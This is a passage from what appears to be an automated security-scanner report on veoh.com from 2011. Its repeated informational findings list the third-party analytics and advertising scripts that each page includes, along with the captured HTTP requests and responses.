Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 27466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.43. http://www.veoh.com/collection/Veoh-Editor-Picks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /collection/Veoh-Editor-Picks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /collection/Veoh-Editor-Picks HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 105468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769594"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.44. http://www.veoh.com/corporate/aboutus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/aboutus

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/aboutus HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 26605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.45. http://www.veoh.com/corporate/copyright  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/copyright

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/copyright HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 29638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.46. http://www.veoh.com/corporate/pressroom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/pressroom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/pressroom HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 39434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.47. http://www.veoh.com/corporate/privacypolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/privacypolicy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/privacypolicy HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=21
Content-Length: 36356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.48. http://www.veoh.com/corporate/termsofuse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/termsofuse

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/termsofuse HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 61158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.49. http://www.veoh.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /download HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 25488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.50. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download/index/permalinkId/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /download/index/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=82
Content-Length: 27106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.51. http://www.veoh.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /faq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faq HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 24099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.52. http://www.veoh.com/favorites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.53. http://www.veoh.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /help

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /help HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 24102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
